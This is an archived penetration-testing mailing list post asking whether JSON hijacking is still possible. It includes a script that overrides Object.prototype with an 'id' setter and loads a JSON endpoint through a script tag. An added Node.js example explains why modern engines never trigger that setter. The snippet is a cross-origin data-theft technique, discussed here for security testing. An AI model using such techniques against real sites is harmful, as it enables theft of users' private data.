Penetration Testing mailing list archives
JSON Hijacking
From: Ricardo Iramar dos Santos <riramar () gmail com>
Date: Wed, 24 Feb 2016 18:22:16 -0300
Hi All,

Do you guys know if JSON Hijacking is still possible? It seems the method __defineSetter__ has been deprecated, but I've seen some posts that it's still possible to override the constructor. I tried using the JavaScript below, but there was no error on the console and no alert popup.

<script>
Object.defineProperty(Object.prototype, 'id', {
  set: function(obj) {
    for (var i in obj) {
      alert(i + '=' + obj[i]);
    }
  }
});
</script>
<script src="https://blah.returning.json"></script>

Thanks!
Ricardo Iramar
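Added example, not part of the original post: a Node.js check of how an ES5+ engine treats the `Object.prototype` setter from the message when a JSON array is evaluated as script source. `SAMPLE_JSON` and all function names are constructed for illustration; indirect `eval` stands in for the `<script src>` include.

```javascript
// Constructed sample response body (not from the post).
const SAMPLE_JSON = '[{"id": 42, "name": "alice"}]';

// Same idea as the post: a setter for "id" on Object.prototype.
function installSetter(log) {
  Object.defineProperty(Object.prototype, 'id', {
    configurable: true, // so the setter can be removed again afterwards
    set(value) { log.push(value); }
  });
}

function removeSetter() { delete Object.prototype.id; }

// Evaluate the JSON array as global script code, as a <script src> body would be.
function literalEvaluation() {
  const log = [];
  installSetter(log);
  try {
    const result = (0, eval)(SAMPLE_JSON);
    // Literal properties are defined directly on the new object
    // ([[DefineOwnProperty]]), so the inherited setter is never consulted.
    const desc = Object.getOwnPropertyDescriptor(result[0], 'id');
    return { setterCalls: log.length, ownId: desc.value };
  } finally {
    removeSetter();
  }
}

// Contrast: ordinary assignment uses [[Set]], which walks the prototype chain.
function plainAssignment() {
  const log = [];
  installSetter(log);
  try {
    const o = {};
    o.id = 42;
    const hasOwnId = Object.prototype.hasOwnProperty.call(o, 'id');
    return { setterCalls: log.length, hasOwnId };
  } finally {
    removeSetter();
  }
}

// A top-level JSON object (not an array) does not even parse as a script:
// the braces are read as a block statement and the colon is a syntax error.
function bareObjectIsSyntaxError() {
  try { (0, eval)('{"id": 42, "name": "alice"}'); return false; }
  catch (e) { return e instanceof SyntaxError; }
}
```

The literal path reports zero setter calls and an own `id` data property, while plain assignment reaches the setter once. That matches the behaviour described in the message: no error and no alert.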